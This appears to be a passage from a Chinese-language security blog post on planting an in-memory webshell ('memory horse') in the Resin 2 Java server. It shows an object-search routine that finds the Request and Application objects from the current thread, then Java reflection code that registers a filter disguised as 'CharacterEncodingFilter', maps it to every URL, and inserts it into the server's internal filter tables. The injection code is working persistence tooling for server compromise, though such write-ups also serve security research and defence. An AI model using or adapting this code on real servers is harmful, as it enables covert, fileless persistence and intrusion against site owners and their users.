Java安全之Resin2内存马( 二 )


//设置搜索类型包含ServletRequest,RequstGroup,Request...等关键字的对象List<Keyword> keys = new ArrayList();keys.add(new Keyword.Builder().setField_type("Request").build());keys.add(new Keyword.Builder().setField_type("Application").build());//新建一个广度优先搜索Thread.currentThread()的搜索器SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys);//打开调试模式searcher.setIs_debug(true);//挖掘深度为20searcher.setMax_search_depth(20);//设置报告保存位置searcher.setReport_save_path("/tmp/");searcher.searchObject();result
# RequestTargetObject = {java.lang.Thread}---> target = {com.caucho.server.TcpConnection}---> request = {com.caucho.server.http.HttpRequest}# ApplicationTargetObject = {java.lang.Thread}---> contextClassLoader = {com.caucho.java.CompilingClassLoader}---> attributes = {java.util.Hashtable}---> attributes = {com.caucho.server.http.Application}

Java安全之Resin2内存马

文章插图
后面直接添加即可
主要代码
private static void doInject(){filterName = "CharacterEncodingFilter-" + System.nanoTime();try {if (APPLICATION !=null){// Regexp//Class RegexpClazz = getClazz("com.caucho.regexp.Regexp");//Constructor RegexpConstructor = RegexpClazz.getDeclaredConstructor(String.class);//Object regexpObj = RegexpConstructor.newInstance("^(?=/)|^$");// QFilterConfigClass QFilterConfigclazz = getClazz("com.caucho.server.http.QFilterConfig");Constructor QFilterConfigConstructor = QFilterConfigclazz.getDeclaredConstructor(getClazz("com.caucho.server.http.Application"), String.class, String.class, getClazz("com.caucho.util.RegistryNode"));QFilterConfigConstructor.setAccessible(true);Object QFilterConfigObj = QFilterConfigConstructor.newInstance(APPLICATION, filterName, "HiganbanaFilter", null);// FilterMapClass filterMapClazz = getClazz("com.caucho.server.http.FilterMap");Constructor filterMapConstructor = filterMapClazz.getDeclaredConstructor();filterMapConstructor.setAccessible(true);Object filterMap = filterMapConstructor.newInstance();// set FilterMap regexpMethod setRegexpMethod = filterMap.getClass().getDeclaredMethod("setURLPattern", String.class, String.class);setRegexpMethod.setAccessible(true);setRegexpMethod.invoke(filterMap,"/*", null);// set FilterMap dataMethod setDataMethod = filterMap.getClass().getDeclaredMethod("setData", Object.class);setDataMethod.setAccessible(true);setDataMethod.invoke(filterMap,QFilterConfigObj);// add FilterMap 2 _filterMapArrayList _filterMap = (ArrayList) getFV(APPLICATION, "_filterMap");_filterMap.add(filterMap);// add QFilterConfig 2 _filterListArrayList _filterList = (ArrayList) getFV(APPLICATION, "_filterList");_filterList.add(QFilterConfigObj);// put QFilterConfig 2 _filtersHashtable _filters = (Hashtable) getFV(APPLICATION, "_filters");_filters.put(filterName, QFilterConfigObj);}} catch (Exception e) {}}private static void getApplication(){Thread thread = Thread.currentThread();ClassLoader contextClassLoader = thread.getContextClassLoader();Hashtable attributesObj1 = (Hashtable) getFV(contextClassLoader,"attributes");APPLICATION = attributesObj1.get("caucho.application");}但是有个弊端,debug逻辑的时候发现,只有在当前web.xml中已经存在有filter才能添加进去 。暂未解决该问题 。
最后项目遇到的感觉比较有趣且极端的问题,虽然也不是很好的解决方案 。
【Java安全之Resin2内存马】

经验总结扩展阅读